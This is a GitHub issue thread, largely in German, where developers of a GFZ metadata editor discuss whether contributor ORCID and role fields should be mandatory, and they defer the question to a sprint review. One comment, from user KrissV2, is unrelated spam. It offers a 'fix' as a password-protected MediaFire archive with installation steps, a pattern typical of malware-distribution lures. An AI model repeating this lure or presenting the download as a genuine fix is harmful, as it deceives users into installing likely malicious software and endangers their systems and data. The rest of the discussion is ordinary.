### ISSUE TITLE
Pflichtfelder überprüfen und überarbeiten

### ISSUE THREAD

**Issue by McNamara84** [McNamara84/gfz-metadata-editor-msl-v2#11]
Aktuell sind Contributor ORCID und Role Pflichtfelder, aber wenn kein Contributor angegeben wird, kann man diese Felder auch nicht ausfüllen?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Ali-GeoFZ** [comment]
Inspektion an allen Feldern im Formular und dann optimieren falls es der fall wäre

**Comment by Ali-GeoFZ** [comment]
@McNamara84, Wollen wir wirklich die Autoren in der Fourm-Gruppe (Author(s)) verpflichten, ihre ORCID-ID anzugeben? Es gibt Autoren, die keine ORCID-ID besitzen. 

Beispiel:
https://dataservices.gfz-potsdam.de/panmetaworks/showshort.php?id=cdb17ab5-4449-11ef-967a-4ffbfe06208e

Die Frage gilt auch für "FG" Contributing Person(s)

**Comment by McNamara84** [comment]
> @McNamara84, Wollen wir wirklich die Autoren in der Fourm-Gruppe (Author(s)) verpflichten, ihre ORCID-ID anzugeben? Es gibt Autoren, die keine ORCID-ID besitzen.
> 
> Beispiel: https://dataservices.gfz-potsdam.de/panmetaworks/showshort.php?id=cdb17ab5-4449-11ef-967a-4ffbfe06208e
> 
> Die Frage gilt auch für "FG" Contributing Person(s)

Also ich würde sagen, dass wir das nicht zum Pflichtfeld machen sollten, aus dem von dir genannten Grund. So weit ich mich erinnere war das ein Wunsch der Stakeholder bei uns am GFZ. Mach es ruhig erstmal zum Pflichtfeld und dann nehmen wir das mit in die Sprint Review nächste Woche. Das müssen dann die dort anwesenden Stakeholder entscheiden.

**Comment by Ali-GeoFZ** [comment]
Ok dann lass ich die jetzt als Pflichtfelder und wir besprechen das in unserm Sprint

**Comment by jaFHP** [comment]
Ich meine, dass das ein Wunsch vom GFZ (Kirsten?) war, es zum Pflichtfeld zu machen.

**Comment by McNamara84** [comment]
Ja, genau. Kirsten ürde am liebsten sämtliche Forschenden nur noch mit ihrer ORCID ansprechen.^^

**Comment by Ali-GeoFZ** [comment]
Kirsten: Wir können die Autoren nicht dazu verpflichten, ihre ORCIDs anzugeben, aber ich halte es für wichtig, das Feld so deutlich wie möglich zu kennzeichnen, damit die Autoren daran erinnert werden und es ausfüllen. Die exakten Daten sind für uns von großen Bedeutung. Janas Idee könnte in diesem fall die beste Lösung sein. "ISSUE #132".
